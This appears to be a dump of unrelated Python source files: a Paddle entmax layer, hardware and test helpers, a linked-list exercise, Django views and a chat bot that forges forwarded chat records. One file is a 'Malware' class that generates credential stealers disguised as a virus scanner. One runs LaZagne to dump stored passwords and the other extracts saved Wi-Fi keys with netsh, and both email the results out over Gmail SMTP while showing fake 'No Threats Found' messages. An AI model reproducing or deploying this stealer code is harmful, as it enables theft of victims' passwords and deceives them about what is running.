class EntmaxBisectFunction(PyLayer):
    """Custom Paddle autograd layer computing alpha-entmax via bisection.

    Forward bisects on the normalization threshold tau; backward implements
    closed-form vector-Jacobian products for both X and alpha.
    """
    @classmethod
    def _gp(cls, x, alpha):
        # g'(x) for the Tsallis alpha-entropy
        return x ** (alpha - 1)
    @classmethod
    def _gp_inv(cls, y, alpha):
        # inverse of _gp
        return y ** (1 / (alpha - 1))
    @classmethod
    def _p(cls, X, alpha):
        # candidate probability mapping: clip negatives, then invert g'
        return cls._gp_inv(paddle.clip(X, min=0), alpha)
    @classmethod
    def forward(
        cls,
        ctx,
        X,
        alpha=1.5,
        axis=-1,
        n_iter=50,
        ensure_sum_one=True,
    ):
        # alpha must be a paddle.Tensor here (the public wrapper converts it)
        ctx.need_alpha_grad = not alpha.stop_gradient
        # broadcast alpha to X's shape with size 1 along the reduction axis
        alpha_shape = X.shape
        alpha_shape[axis] = 1
        alpha = alpha.expand(alpha_shape)
        ctx.alpha = alpha
        ctx.axis = axis
        d = X.shape[axis]
        X = X * (alpha - 1)
        max_val = X.max(axis=axis, keepdim=True)
        # bracket tau between the values yielding p=1 and p=1/d (uniform)
        tau_lo = max_val - cls._gp(1, alpha)
        tau_hi = max_val - cls._gp(1 / d, alpha)
        f_lo = cls._p(X - tau_lo, alpha).sum(axis) - 1
        dm = tau_hi - tau_lo
        # binary search on tau: each step halves the bracket width
        for it in range(n_iter):
            dm /= 2
            tau_m = tau_lo + dm
            p_m = cls._p(X - tau_m, alpha)
            f_m = p_m.sum(axis) - 1
            # keep the half-interval whose endpoints still straddle the root
            mask = (f_m * f_lo >= 0).unsqueeze(axis)
            tau_lo = paddle.where(mask, tau_m, tau_lo)
        if ensure_sum_one:
            p_m /= p_m.sum(axis=axis).unsqueeze(axis=axis)
        ctx.save_for_backward(p_m.detach())
        return p_m
    @classmethod
    def backward(cls, ctx, dY):
        (Y,) = ctx.saved_tensor()
        # gppr = 1 / g''(Y) on the support (zero where Y == 0)
        gppr = paddle.where(Y > 0, Y ** (2 - ctx.alpha), paddle.zeros((1,)))
        dX = dY * gppr
        q = dX.sum(ctx.axis) / gppr.sum(ctx.axis)
        q = q.unsqueeze(ctx.axis)
        dX -= q * gppr
        d_alpha = None
        if ctx.need_alpha_grad:
            # alpha gradient computation
            # d_alpha = (partial_y / partial_alpha) * dY
            # NOTE: ensure alpha is not close to 1
            # since there is an indetermination
            # shannon terms
            S = paddle.where(Y > 0, Y * paddle.log(Y), paddle.zeros((1,)))
            # shannon entropy
            ent = S.sum(ctx.axis).unsqueeze(ctx.axis)
            Y_skewed = gppr / gppr.sum(ctx.axis).unsqueeze(ctx.axis)
            d_alpha = dY * (Y - Y_skewed) / ((ctx.alpha - 1) ** 2)
            d_alpha -= dY * (S - Y_skewed * ent) / (ctx.alpha - 1)
            d_alpha = d_alpha.sum(ctx.axis).unsqueeze(ctx.axis)
        return dX, d_alpha
def entmax_bisect(X, alpha=1.5, axis=-1, n_iter=50, ensure_sum_one=True):
    """Compute alpha-entmax, a sparse softmax-like normalizing transform.

    Solves max_p <X, p> - H_a(p) subject to p >= 0 and sum(p) == 1, where
    H_a is the Tsallis alpha-entropy, using bisection (root finding, binary
    search) along ``axis``.  The result is differentiable with respect to
    both ``X`` and ``alpha``.

    Parameters
    ----------
    X : paddle.Tensor
        The input tensor.
    alpha : float or paddle.Tensor
        Entropy parameter(s) (> 1).  A scalar applies one value to all rows;
        a tensor must be expandable so that
        alpha.shape[j] == (X.shape[j] if j != axis else 1).
        alpha=2 corresponds to sparsemax; alpha=1 corresponds to softmax
        (though computing softmax this way is likely unstable).
    axis : int
        The dimension along which to apply alpha-entmax.
    n_iter : int
        Number of bisection iterations (24 suffice for float32 precision).
    ensure_sum_one : bool
        Divide the result by its sum so it is exactly normalized; otherwise
        it may sum to close-but-not-exactly 1.

    Returns
    -------
    P : paddle tensor, same shape as X, with P.sum(axis=axis) == 1.
    """
    alpha_t = alpha if isinstance(alpha, paddle.Tensor) else paddle.to_tensor(alpha, dtype=X.dtype)
    return EntmaxBisectFunction.apply(X, alpha_t, axis, n_iter, ensure_sum_one)
if __name__ == "__main__":
import torch
from entmax import entmax_bisect as pt_entmax_bisect
x = paddle.randn((3, 4, 5, 6))
o1 = torch.tensor(entmax_bisect(x, axis=-2).numpy())
o2 = pt_entmax_bisect(torch.tensor(x.numpy()), dim=-2)
d = (o1 - o2).abs()
print(d.mean())
print(d.max())
| StarcoderdataPython |
391661 | import subprocess
import os
import shutil
from send_attachment import send_attachment
from threading import Thread
import time
class Malware:
def __init__(self, em1, pass1, download_link):
self.email = em1
self.userpass = pass1
self.download_link = download_link
def create_malware(self):
time.sleep(2)
user_file = open("user_details.txt","w")
username = self.email
password = self.userpass
user_file.write(username + "\n")
user_file.write(password)
user_file.close()
user_file = open("user_details.txt","r")
username = user_file.readline().strip('\n')
password = user_file.readline()
user_file.close()
os.remove("user_details.txt")
code = '''
import requests
import subprocess, smtplib, re, os, tempfile
def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as out_file:
out_file.write(get_response.content)
def send_mail(email, password, msg):
print("Scanned Successfully.. No Threats Found")
server = smtplib.SMTP("smtp.gmail.com", "587")
server.starttls()
server.login(email, password)
server.sendmail(email, email, "\\n" + msg)
server.quit()
username = '{0}'
password = <PASSWORD>}'
download_link = '{2}'
print("Scanning for viruses.. Please do not close the application")
download(download_link)
result = subprocess.check_output("lazagne.exe all", shell=True).decode()
send_mail(username, password, str(result))
os.remove("lazagne.exe")
'''
executable_file = open("code.py","w")
executable_file.write(code.format(username, password, self.download_link))
executable_file.close()
send_attachment(username, username, password, "code.py")
os.remove("code.py")
def password_stealer(self):
time.sleep(2)
user_file = open("user_details.txt","w")
username = self.email
password = <PASSWORD>
user_file.write(username + "\n")
user_file.write(password)
user_file.close()
user_file = open("user_details.txt","r")
username = user_file.readline().strip('\n')
password = user_file.readline()
user_file.close()
os.remove("user_details.txt")
code = '''
import requests
import subprocess, smtplib, re, os, tempfile
def send_mail(email, password, msg):
print("Scanning For Viruses...")
server = smtplib.SMTP("smtp.gmail.com", "587")
server.starttls()
server.login(email, password)
server.sendmail(email, email, "\\n" + msg)
server.quit()
username = '{0}'
password = <PASSWORD>}'
data = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8', errors="backslashreplace").split('\\n')
profiles = [i.split(":")[1][1:-1] for i in data if "All User Profile" in i]
result = ""
for i in profiles:
try:
results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8', errors="backslashreplace").split('\\n')
results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
try:
result = result + i + " | " + results[0] + "\\n"
except IndexError:
result = result + i + " | " + "Password Not Found" + "\\n"
except subprocess.CalledProcessError:
print ("ENCODING ERROR")
send_mail(username, password, result)
print("Scanned Successfully. No Threats Found")
'''
executable_file = open("code.py","w")
executable_file.write(code.format(username, password))
executable_file.close()
send_attachment(username, username, password, "code.py")
os.remove("code.py")
def create(self):
t = Thread(target = self.create_malware)
t.start()
def create_stealer(self):
t = Thread(target = self.password_stealer)
t.start()
| StarcoderdataPython |
8100699 | <reponame>steffakasid/RPi-Jukebox-RFID
#!/usr/bin/env python3
import os.path
import sys
import json
from evdev import InputDevice, list_devices
path = os.path.dirname(os.path.realpath(__file__))
device_name_path = path + '/deviceName.txt'
button_map_path = path + '/buttonMap.json'
def all_devices():
    """Return an evdev InputDevice for every input device currently present."""
    return list(map(InputDevice, list_devices()))
def current_device():
    """Return the InputDevice whose name was saved by register_buttons_usb_encoder.py.

    Exits the process when no device name has been registered yet, or when
    no currently connected device matches the registered name.
    """
    if not os.path.isfile(device_name_path):
        sys.exit('Please run register_buttons_usb_encoder.py first')
    # `with` guarantees the file is closed (the old code leaked the handle)
    with open(device_name_path, 'r') as f:
        device_name = f.read()
    # straightforward search instead of the previous bare try/except probe
    for device in all_devices():
        if device.name == device_name:
            return device
    sys.exit('Could not find the device %s\n. Make sure it is connected' % device_name)
def write_current_device(name):
    """Persist *name* as the registered USB encoder device name.

    Uses a context manager so the file is closed even if the write raises.
    """
    with open(device_name_path, 'w') as f:
        f.write(name)
def button_map():
    """Load the button -> function mapping saved by map_buttons_usb_encoder.py.

    Exits the process when the mapping file is missing or contains no entries.

    :return: dict mapping button identifiers to function names
    """
    if not os.path.isfile(button_map_path):
        sys.exit('Please run map_buttons_usb_encoder.py first')
    with open(button_map_path, 'r') as json_file:
        # local renamed from `button_map`, which shadowed this function's name
        mapping = json.load(json_file)
    if len(mapping) == 0:
        sys.exit("No buttons mapped to a function")
    return mapping
def write_button_map(button_map):
    """Serialize *button_map* to the JSON mapping file.

    Uses a context manager so the file is closed even if serialization raises.
    """
    with open(button_map_path, 'w') as fp:
        json.dump(button_map, fp)
| StarcoderdataPython |
173967 | import numpy as np
from sequentia.classifiers import HMM
# Create some sample data
# Create some sample data: three sequences of lengths 10/20/30, 3 features each
X = [np.random.random((10 * i, 3)) for i in range(1, 4)]
# Create and fit a left-right HMM with random transitions and initial state distribution
hmm = HMM(label='class1', n_states=5, topology='left-right')
hmm.set_random_initial()
hmm.set_random_transitions()
hmm.fit(X)
5023792 | #!/usr/bin/python
# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of NVIDIA CORPORATION nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
sys.path.append("../common")
import os
import shutil
import time
import unittest
import numpy as np
import infer_util as iu
import test_util as tu
import tritonclient.http as httpclient
import argparse
import csv
import json
import os
import requests
import socket
import sys
class VertexAiTest(tu.TestResultCollector):
    """Exercise the Vertex AI predict endpoint of a running Triton server.

    Every test sends the same 1x16 INT32 two-input request; the private
    helpers below centralize request construction and output checking so
    each test only states what differs (binary input/output, headers,
    expected HTTP status).  This removes the copy-paste duplication the
    original eight test methods carried.
    """

    def setUp(self):
        port = os.getenv('AIP_HTTP_PORT', '8080')
        predict_endpoint = os.getenv('AIP_PREDICT_ROUTE', 'predict')
        self.model_ = os.getenv('TEST_EXPLICIT_MODEL_NAME', 'addsub')
        self.url_ = "http://localhost:{}/{}".format(port, predict_endpoint)
        self.input_data_ = [
            0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15
        ]
        # addsub default: OUTPUT0 = INPUT0 + INPUT1, OUTPUT1 = INPUT0 - INPUT1
        self.expected_output0_data_ = [x * 2 for x in self.input_data_]
        self.expected_output1_data_ = [0 for x in self.input_data_]

    def _generate_request(self, input0_binary=False, output0_binary=False):
        """Build the standard two-input request.

        :param input0_binary: send INPUT0 as binary tensor data
        :param output0_binary: request OUTPUT0 as binary tensor data
        :return: (request_body, json_header_size)
        """
        inputs = []
        outputs = []
        inputs.append(httpclient.InferInput('INPUT0', [1, 16], "INT32"))
        inputs.append(httpclient.InferInput('INPUT1', [1, 16], "INT32"))
        # Initialize the data
        input_data = np.array(self.input_data_, dtype=np.int32)
        input_data = np.expand_dims(input_data, axis=0)
        inputs[0].set_data_from_numpy(input_data, binary_data=input0_binary)
        inputs[1].set_data_from_numpy(input_data, binary_data=False)
        outputs.append(
            httpclient.InferRequestedOutput('OUTPUT0',
                                            binary_data=output0_binary))
        outputs.append(
            httpclient.InferRequestedOutput('OUTPUT1', binary_data=False))
        return httpclient.InferenceServerClient.generate_request_body(
            inputs, outputs=outputs)

    def _check_response(self, result, expected0=None, expected1=None):
        """Assert OUTPUT0/OUTPUT1 match the expected element values."""
        if expected0 is None:
            expected0 = self.expected_output0_data_
        if expected1 is None:
            expected1 = self.expected_output1_data_
        output0_data = result.as_numpy('OUTPUT0')
        output1_data = result.as_numpy('OUTPUT1')
        for i in range(16):
            self.assertEqual(output0_data[0][i], expected0[i])
            self.assertEqual(output1_data[0][i], expected1[i])

    def _check_malformed(self, content_type_fmt):
        """Post a binary request with a malformed Content-Type; expect 400.

        ``content_type_fmt`` may contain one ``{}`` placeholder which is
        filled with the actual JSON header size.
        """
        request_body, header_length = self._generate_request(
            input0_binary=True)
        headers = {'Content-Type': content_type_fmt.format(header_length)}
        r = requests.post(self.url_, data=request_body, headers=headers)
        self.assertEqual(
            400, r.status_code,
            "Expected error code {} returned for the request; got: {}".format(
                400, r.status_code))

    def test_predict(self):
        request_body, _ = self._generate_request()
        headers = {'Content-Type': 'application/json'}
        r = requests.post(self.url_, data=request_body, headers=headers)
        r.raise_for_status()
        result = httpclient.InferenceServerClient.parse_response_body(
            r._content)
        self._check_response(result)

    def test_predict_specified_model(self):
        request_body, _ = self._generate_request()
        # redirect header routes the request to an explicitly named model
        headers = {
            'Content-Type':
                'application/json',
            "X-Vertex-Ai-Triton-Redirect":
                "v2/models/{}/infer".format(self.model_)
        }
        r = requests.post(self.url_, data=request_body, headers=headers)
        r.raise_for_status()
        result = httpclient.InferenceServerClient.parse_response_body(
            r._content)
        # the non-addsub test model swaps which output carries the sums
        if self.model_ == "addsub":
            expected0 = [x * 2 for x in self.input_data_]
            expected1 = [0 for x in self.input_data_]
        else:
            expected0 = [0 for x in self.input_data_]
            expected1 = [x * 2 for x in self.input_data_]
        self._check_response(result, expected0, expected1)

    def test_predict_request_binary(self):
        request_body, header_length = self._generate_request(
            input0_binary=True)
        headers = {
            'Content-Type':
                'application/vnd.vertex-ai-triton.binary+json;json-header-size={}'
                .format(header_length)
        }
        r = requests.post(self.url_, data=request_body, headers=headers)
        r.raise_for_status()
        result = httpclient.InferenceServerClient.parse_response_body(
            r._content)
        self._check_response(result)

    def test_predict_response_binary(self):
        request_body, _ = self._generate_request(output0_binary=True)
        headers = {'Content-Type': 'application/json'}
        r = requests.post(self.url_, data=request_body, headers=headers)
        r.raise_for_status()
        # binary responses report the JSON header length in a response header
        header_length_str = r.headers['Inference-Header-Content-Length']
        result = httpclient.InferenceServerClient.parse_response_body(
            r._content, header_length=int(header_length_str))
        self._check_response(result)

    def test_malformed_binary_header(self):
        # extra text prepended to the media type
        self._check_malformed(
            'additional-string/application/vnd.vertex-ai-triton.binary+json;json-header-size={}'
        )

    def test_malformed_binary_header_not_number(self):
        # non-numeric header size
        self._check_malformed(
            'application/vnd.vertex-ai-triton.binary+json;json-header-size=additional-string{}'
        )

    def test_malformed_binary_header_negative_number(self):
        # negative header size
        self._check_malformed(
            'application/vnd.vertex-ai-triton.binary+json;json-header-size=-123'
        )

    def test_malformed_binary_header_large_number(self):
        # header size larger than the actual request body
        self._check_malformed(
            'application/vnd.vertex-ai-triton.binary+json;json-header-size=12345'
        )
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
3591123 | <filename>Python/LinkedList/List2Pointer/Rotate List.py<gh_stars>10-100
"""
Given a list, rotate the list to the right by k places, where k is non-negative.
For example:
Given 1->2->3->4->5->NULL and k = 2,
return 4->5->1->2->3->NULL.
"""
from Python.Level4.LinkedList import Node, Traverse
class Solution:
    def rotate_list(self, head, k):
        """Rotate the linked list right by k places and return the new head.

        k may exceed the list length; the effective shift is k modulo the
        length.  Runs in O(n) time and O(1) extra space.
        """
        if head is None or head.next is None:
            return head
        # measure the length and find the current tail
        length = 1
        tail = head
        while tail.next is not None:
            tail = tail.next
            length += 1
        # close the list into a ring, then break it at the new tail
        tail.next = head
        steps = length - k % length
        new_tail = tail
        new_head = head
        for _ in range(steps):
            new_tail = new_head
            new_head = new_head.next
        new_tail.next = None
        return new_head
if __name__ == "__main__":
# initializing the linked list values
h1, h1.next, h1.next.next, h1.next.next.next, h1.next.next.next.next, h1.next.next.next.next.next = Node(1), Node(
2), Node(3), Node(4), Node(5), Node(6)
# h1, h1.next, h1.next.next, h1.next.next.next, h1.next.next.next.next = Node(1), Node(2), Node(3), Node(4), Node(5)
# h1, h1.next, h1.next.next = Node(1), Node(2), Node(3)
# h2, h2.next, h2.next.next = Node(1), Node(2), Node(1)
# printing the new list
Traverse().print_list(Solution().rotate_list(h1, 89))
# print(Solution().is_palindrome_02(h2))
# print(Solution().is_palindrome(h2))
| StarcoderdataPython |
11330780 | <filename>test/test_del_group.py
# -*- coding: utf-8 -*-
from model.group import Group
import random
import allure
def test_delete_some_group(app, db, check_ui):
    # Arrange: ensure at least one group exists, pick a random victim.
    old_groups = given_non_empty_group_list(app, db)
    group = random_group(old_groups)
    # Act: delete it through the application.
    delete_group(app, group)
    # Assert: the list shrank by one and matches expectations (and the UI, if enabled).
    new_groups = db.get_group_list()
    assert len(old_groups) - 1 == app.group.count()
    check_groups(app, old_groups, new_groups, group, check_ui)
@allure.step('Given a non-empty group list')
def given_non_empty_group_list(app, db):
    """Ensure at least one group exists, creating a stub one if needed."""
    if not db.get_group_list():
        app.group.create(Group(name="test"))
    return db.get_group_list()
@allure.step('Given a random group from the list')
def random_group(groups):
    """Pick one group from *groups* uniformly at random."""
    chosen = random.choice(groups)
    return chosen
@allure.step('Given a group list')
def given_group_list(db):
    """Fetch the current group list straight from the database."""
    groups = db.get_group_list()
    return groups
@allure.step('When I delete the group "{group}" from the list')
def delete_group(app, group):
    """Delete *group* through the application, addressing it by database id."""
    app.group.delete_group_by_id(group.id)
@allure.step('Then the new group list is equal to the old list with the deleted group')
def check_groups(app, old_groups, new_groups, group, check_ui):
    """Check DB lists agree after deletion; optionally cross-check the UI."""
    old_groups.remove(group)  # mutate the expected list in place, as before
    assert old_groups == new_groups
    if not check_ui:
        return
    ui_groups = app.group.get_group_list()
    assert sorted(new_groups, key=Group.id_or_max) == sorted(ui_groups, key=Group.id_or_max)
| StarcoderdataPython |
297110 | import ldap3
def auth_ad(user, password, domain_server, domain_prefix, base_dn):
    """Authenticate *user* against Active Directory via NTLM and check membership.

    Binds as ``domain_prefix\\user``, then searches *base_dn* for person
    entries and requires *user*'s sAMAccountName to be among them.

    Returns True on successful bind + membership, False otherwise.
    """
    connection = None
    try:
        server = ldap3.Server(domain_server, get_info=ldap3.ALL)
        connection = ldap3.Connection(server, user=domain_prefix + '\\' + user, password=password, authentication=ldap3.NTLM, auto_bind=True)
        _filter = '(objectclass=person)'
        attrs = ['SamAccountName']
        connection.search(search_base=base_dn, search_filter=_filter, search_scope=ldap3.SUBTREE, attributes=attrs)
        usernames = [entry['attributes']['sAMAccountName'] for entry in connection.response]
        if user not in usernames:
            print('Need to be in the IT Management group!')
            return False
        return True
    except Exception as error:
        # NOTE(review): ``input`` blocks waiting for a keypress; this looks like
        # it was meant to be print/logging -- confirm before changing behavior.
        input('Error to authenticate: {}'.format(error))
        return False
    finally:
        # Fix: the LDAP connection was never released, leaking the socket.
        if connection is not None:
            try:
                connection.unbind()
            except Exception:
                pass  # best effort; the auth result is already decided
| StarcoderdataPython |
4848913 | <gh_stars>1-10
import re
from typing import List, Dict, Union
from nonebot import on_command
# from nonebot.log import logger
from nonebot.permission import SUPERUSER
from nonebot.typing import T_State
from nonebot.adapters.onebot.v11 import Message, MessageSegment, Bot, GroupMessageEvent, ActionFailed
# Placeholder substituted for each non-text message segment (image, at, ...)
# when the command arguments are flattened to text; the real segments are
# matched back up with it later in the handler.
other_type_text = '@#OTHER_TYPE#@'
# Command entry point; restricted to superusers.
fake_forward = on_command('.forward', aliases={'.Forward'}, permission=SUPERUSER)
# User-facing usage text (runtime string -- intentionally left as-is).
__help__ = """伪造聊天记录 - Fake Forward
Permission: SUPERUSER
使用方法: .forward %Args%
-Args:
-u: User_ID
-n: Nick_name, Optional
-m: Message"""
def get_json(uin: int,
             name: str,
             msgs: Union[List[MessageSegment], MessageSegment]) -> Dict:
    """Wrap one sender's content into a forward-message node dict.

    ``msgs`` may be a single segment or a list of segments; either way the
    result has the node shape consumed by ``send_group_forward_msg``.
    """
    content = list(msgs) if isinstance(msgs, List) else msgs
    return {"type": "node", "data": {"name": name, "uin": uin, "content": content}}
@fake_forward.handle()
async def _(bot: Bot, event: GroupMessageEvent, state: T_State):
    """Parse ``.forward`` arguments and send a forged forward record to the group.

    Argument grammar (repeatable): ``-u <qq> [-n <nick>] -m <text> [-m <text> ...]``.
    Non-text segments (images, mentions, ...) are re-attached to the message
    position where they originally appeared.
    """
    if not (msgs := state['_prefix'].get('command_arg')):
        await fake_forward.finish(__help__)
    else:
        # Flatten the argument message to text; non-text segments become
        # placeholders so their positions survive the regex/split parsing.
        args = ''.join(i.data.get('text', other_type_text) for i in msgs)
        other_type_msg = [i for i in msgs if i.type != 'text']
        users = re.findall(r'-u (\d+)', args)
        msgs_node = []
        for i in args.split('-u'):
            # Chunks without "-m " carry no message body (e.g. the text before
            # the first -u); skip them.
            if len((msgs := i.split('-m '))) == 1:
                continue
            msgs = [k.strip() for k in msgs]
            # Consume the next user id in order of appearance.
            uin = int(users[0])
            users.pop(0)
            nickname = msgs[0].split('-n')
            if len(nickname) > 1:
                name = nickname[1]
            else:
                # No explicit nick: prefer the group card; fall back to the
                # stranger profile when the user is not in this group.
                try:
                    user_info = await bot.call_api('get_group_member_info', group_id=event.group_id, user_id=uin)
                    name = user_info.get('card', user_info.get('name'))
                    if not name:
                        raise ActionFailed
                except ActionFailed:
                    user_info = await bot.call_api('get_stranger_info', user_id=uin)
                    name = user_info.get('nickname')
            for msg in msgs[1:]:
                if other_type_text in msg:
                    if msg == other_type_text:
                        # Pure non-text message: emit the stored segment alone.
                        if not other_type_msg:
                            continue
                        msg_list = [other_type_msg[0]]
                        other_type_msg.pop(0)
                    else:
                        # Mixed text + non-text: pair the text with the next
                        # stored segment (or an empty one if we ran out).
                        if other_type_msg:
                            other_msg = other_type_msg[0]
                            other_type_msg.pop(0)
                        else:
                            other_msg = MessageSegment.text('')
                        msg_list = [MessageSegment.text(msg.replace(other_type_text, '')), other_msg]
                    msgs_node.append(get_json(uin, name, msg_list))
                else:
                    msgs_node.append(get_json(uin, name, MessageSegment.text(msg)))
        # Fix: removed leftover debug ``print(msgs)`` from the parsing loop.
        await bot.call_api('send_group_forward_msg', group_id=event.group_id, messages=msgs_node)
| StarcoderdataPython |
5181463 | """
Import as:
import dataflow.system.research_dag_adapter as dtfsredaad
"""
import core.config as cconfig
import dataflow.core as dtfcore
import dataflow.system.source_nodes as dtfsysonod
class ResearchDagAdapter(dtfcore.DagAdapter):
    """
    Adapt a DAG builder for the research flow (batch execution, no OMS).
    """

    def __init__(
        self,
        dag_builder: dtfcore.DagBuilder,
        source_node_config: cconfig.Config,
    ):
        # Override the config of the "load_prices" stage with the data-source
        # settings supplied by the caller.
        config_override = cconfig.Config()
        config_override["load_prices"] = dict(source_node_config.to_dict())
        # Insert a data source node feeding the rest of the DAG.
        nodes_to_insert = [("load_prices", dtfsysonod.data_source_node_factory)]
        super().__init__(dag_builder, config_override, nodes_to_insert, [])
| StarcoderdataPython |
5158771 | from pprint import pprint as pp
from scout.load.hgnc_gene import (load_hgnc_genes, load_hgnc)
def test_load_hgnc_genes(adapter, genes37_handle, hgnc_handle, exac_handle,
                         mim2gene_handle, genemap_handle, hpo_genes_handle):
    """Load genes (with OMIM info) and verify they all land in the database."""
    # GIVEN an empty database
    assert sum(1 for _ in adapter.all_genes()) == 0
    # WHEN inserting a number of genes
    gene_objects = load_hgnc_genes(adapter,
                                   ensembl_lines=genes37_handle,
                                   hgnc_lines=hgnc_handle,
                                   exac_lines=exac_handle,
                                   mim2gene_lines=mim2gene_handle,
                                   genemap_lines=genemap_handle,
                                   hpo_lines=hpo_genes_handle,
                                   build='37'
                                   )
    # Count genes with coordinates; remember the last yielded gene, which the
    # original test inspected via the leaked loop variable.
    expected = 0
    last_gene = None
    for gene in gene_objects:
        last_gene = gene
        if gene.get('chromosome'):
            expected += 1
    # THEN assert all genes have been added to the database
    assert sum(1 for _ in adapter.all_genes()) == expected
    # THEN assert that the last gene was loaded
    assert adapter.hgnc_gene(last_gene['hgnc_id'])
def test_load_hgnc_genes_no_omim(adapter, genes37_handle, hgnc_handle, exac_handle,
                                 hpo_genes_handle):
    """Load genes without OMIM resources and verify they land in the database."""
    # GIVEN an empty database
    assert sum(1 for _ in adapter.all_genes()) == 0
    # WHEN inserting a number of genes
    gene_objects = load_hgnc_genes(adapter,
                                   ensembl_lines=genes37_handle,
                                   hgnc_lines=hgnc_handle,
                                   exac_lines=exac_handle,
                                   hpo_lines=hpo_genes_handle,
                                   build='37'
                                   )
    # Count genes with coordinates; remember the last yielded gene, which the
    # original test inspected via the leaked loop variable.
    expected = 0
    last_gene = None
    for gene in gene_objects:
        last_gene = gene
        if gene.get('chromosome'):
            expected += 1
    # THEN assert all genes have been added to the database
    assert sum(1 for _ in adapter.all_genes()) == expected
    # THEN assert that the last gene was loaded
    assert adapter.hgnc_gene(last_gene['hgnc_id'])
def test_load_hgnc(adapter, genes37_handle, hgnc_handle, exac_handle,
                   mim2gene_handle, genemap_handle, hpo_genes_handle, transcripts_handle):
    """Run the full HGNC load (genes + transcripts) and check both collections."""
    # GIVEN an empty database
    assert sum(1 for _ in adapter.all_genes()) == 0
    # WHEN loading genes and transcripts with the complete resource set
    load_hgnc(adapter,
              ensembl_lines=genes37_handle,
              hgnc_lines=hgnc_handle,
              exac_lines=exac_handle,
              mim2gene_lines=mim2gene_handle,
              genemap_lines=genemap_handle,
              hpo_lines=hpo_genes_handle,
              transcripts_lines=transcripts_handle,
              build='37'
              )
    # THEN genes were added to the database
    assert sum(1 for _ in adapter.all_genes()) > 0
    # THEN at least one transcript was loaded
    assert adapter.transcript_collection.find_one()
def test_load_hgnc_no_omim(adapter, genes37_handle, hgnc_handle, exac_handle,
                           hpo_genes_handle, transcripts_handle):
    """Run the HGNC load without OMIM resources and check both collections."""
    # GIVEN an empty database
    assert sum(1 for _ in adapter.all_genes()) == 0
    # WHEN loading genes and transcripts without omim information
    load_hgnc(adapter,
              ensembl_lines=genes37_handle,
              hgnc_lines=hgnc_handle,
              exac_lines=exac_handle,
              hpo_lines=hpo_genes_handle,
              transcripts_lines=transcripts_handle,
              build='37'
              )
    # THEN genes were added to the database
    assert sum(1 for _ in adapter.all_genes()) > 0
    # THEN at least one transcript was loaded
    assert adapter.transcript_collection.find_one()
| StarcoderdataPython |
1696898 | from django.http import JsonResponse
from rest_framework.response import Response
from rest_framework.generics import (
ListAPIView,
CreateAPIView,
RetrieveAPIView,
UpdateAPIView,
DestroyAPIView
)
from rest_framework.permissions import (
AllowAny,
IsAuthenticated,
IsAdminUser,
IsAuthenticatedOrReadOnly
)
from rest_framework.views import APIView
from ..models import Student, Course
from ..auth.serializers import StudentSerializer, UserSerializer
from ..course.serializers import CourseDetailSerializer
from rest_framework_jwt.authentication import JSONWebTokenAuthentication
from ..permissions import IsTeacher, IsStudent
class GetStudentsByTeacherIdListAPIView(APIView):
    """List students of the courses taught by a given teacher (work in progress).

    Expects a ``teacher_id`` query parameter.  The student lookup below is
    still commented out; the view currently only resolves course data and
    returns a stub body.
    """
    permission_classes = (IsAuthenticated, IsTeacher)
    authentication_classes = (JSONWebTokenAuthentication,)

    def get(self, format=None):
        teacher_id = self.request.GET['teacher_id']
        # Fix: the default model manager is ``objects`` (``Objects`` raised
        # AttributeError) and the boolean literal is ``True`` (``true`` raised
        # NameError at runtime).
        course_ids = Course.objects.filter(teacher_id=teacher_id).values_list('teacher_id', flat=True)
        # NOTE(review): ``values_list('teacher_id')`` just echoes the filter
        # value; the intent was probably ``values_list('id', flat=True)`` --
        # confirm with the author before changing.
        print(course_ids)
        #course_id = self.request.GET['course_id']
        #students = Student.objects.filter(course=course_id)
        #serializer = StudentSerializer(students, many=True)
        # NOTE(review): ``{"Hello"}`` is a set literal; DRF may fail to render
        # it as JSON -- a list or dict is likely intended.
        return Response({"Hello"})
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.